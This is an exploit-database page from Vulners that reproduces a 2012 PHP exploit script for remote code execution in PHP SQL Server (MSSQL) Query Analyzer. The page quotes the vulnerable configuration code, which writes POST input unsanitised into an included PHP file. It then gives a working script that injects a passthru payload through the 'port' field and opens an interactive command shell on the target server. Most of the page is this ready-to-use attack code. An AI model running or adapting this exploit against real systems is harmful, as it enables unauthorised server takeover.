Vulners
Lucene search
PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution
<?php
/*
+------------------------------------------------------------------+
+ PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution +
+------------------------------------------------------------------+
Web-App : PHP SQL Server (MSSQL) Query Analyzer v(0.42 /0.43)
Vendor : http://phpqueryanalyze.sourceforge.net/
Vulnerability : Remote Code Execution
Author : Adel SBM
Website : www.The-code.tk
Tested on : Windows XP SP2
Greetz : Inj3ct0r Milw0rm Exploit DataBase 1337day.com
+-------------------------------------------------------------------+
+ Algeria +
+ 05/03/2012 +
+-------------------------------------------------------------------+
[-] vulnerable code in Configuration.php
009 if (!empty ($_POST['save']))
010 {
011 $db_hostname = $_POST['db_hostname'];
012 $port = $_POST['port'];
013 $db_name = $_POST['db_name'];
014 $username = $_POST['username'];
015 $password = $_POST['password'];
016
017 $data = "<?php\n/*\nPHP Query Analyzer\n\nGenerated by Configuration.php\non ".date('r')."\n/\n\n\$db_hostname='{$_POST['db_hostname']}';\n\$port={$_POST['port']};\n\$db_name='{$_POST['db_name']}';\n\$username='{$_POST['username']}';\n\$password='{$_POST['password']}';\n\n?>";
018
019 $handle = @fopen('db.vars.php', "w+");
020 @fwrite($handle, $data);
021 @fclose($handle);
022 }
023
024
025 include ('db.vars.php');
An attacker might be able to inject and execute PHP code through $_POST['port'] (db.vars.php) file..
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------------------+";
print "\n| PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution BY:AdelSBM |";
print "\n| Greetz to: The Don & Over-X & ind0ushka .. |";
print "\n| TeaM Official website: www.The-code.tk |";
print "\n| Algeria |";
print "\n+------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpqa/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "db_hostname=localhost&password=000&username=test&save=submit&port='';?><?php print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;?><?";
$packet = "POST {$path}Configuration.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$path}db.vakrs.php\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
while(1)
{
print "\[email protected]# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$html = http_send($host, sprintf($packet, base64_encode($cmd)));
$shell = explode("_code_", $html);
preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2012 00:00Current
7.1High risk
Vulners AI Score7.1